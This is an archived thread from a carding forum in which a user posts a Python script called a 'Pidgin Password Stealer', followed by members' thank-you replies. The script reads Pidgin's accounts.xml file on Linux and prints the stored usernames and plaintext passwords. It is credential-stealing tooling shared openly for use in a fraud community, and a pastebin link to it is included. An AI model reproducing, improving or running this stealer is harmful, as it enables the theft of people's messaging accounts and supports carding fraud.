PDA

View Full Version : [ CardingMafia Tools ] Pidgin Password Stealer



Void
03-11-2015, 10:01 AM
Just wrote a new Tools a few days ago For Carding Mafia

Note: this tools Only Works on linux

Dont Forget to say thanks :victorious:

Use like This :



chmod +x pidgin.py
./pidgin.py




#!/usr/bin/env python
#
# Coded By Void (Yahoo: void.carder)
#
# This Tools Is Written For cardmafia.pw
#
# New versions Comming Soon ...

import os
import xml.etree.ElementTree as ET

print "================================================== =="
print "==GET USERNAMES AND PASSWORD'S STORED IN PIDGIN IM=="
print "====Coded By Void (Yahoo: void.carder)=============="
print "=================cardmafia.pw===================="
print "================================================== =="

homeDir = os.getenv("HOME")

if os.path.isdir( homeDir + "/.purple"):

if os.path.isfile(homeDir + "/.purple/accounts.xml"):

tree = ET.parse(homeDir + "/.purple/accounts.xml")
root = tree.getroot()
for accounts in root:
name = accounts.find("name")
if name is None:
continue
else:
print "Username : " + str(name.text)

password = accounts.find("password")
if password is None:
print "password was not found"
continue
else:
print "Password : " + str(password.text)
else:

print "Accounts.xml not found or its not readable"
exit(0)

else:

print "Pidgin Configuration directory Was Not Found "
print "Are You Sure Pidgin is installed ? (-__-)"
exit(0)

Void
03-11-2015, 10:05 AM
added Into Paste Bin :


http://pastebin.com/diUzVvkR

CardingMafia Admin
03-11-2015, 11:48 AM
hey thanks nice one from our MODerator
thanks for post

Void
03-12-2015, 10:11 AM
hey thanks nice one from our MODerator
thanks for post

Your Wellcome :D

kotomotos7s
09-05-2016, 05:07 PM
hey thanks nice one from our MODerator

kotomotos7s
09-05-2016, 05:08 PM
loool hey thanks nice one from our MODerator

moca
09-09-2016, 02:58 PM
Thanks for our MODerator

real8biz
11-02-2016, 11:51 PM
thanks and lovely more grace

Fastline
12-09-2016, 03:19 PM
Thanks man

evilco
12-13-2016, 08:59 AM
loool hey thanks nice one from our MODerator

zeusaeon
12-20-2016, 09:15 AM
What does this do?

Macjay420
12-22-2016, 01:59 AM
Thanx for the hard work

sanguinairs
01-21-2017, 12:43 AM
thxxxxx beaucoup

abdelou2
02-14-2017, 02:32 AM
goood job man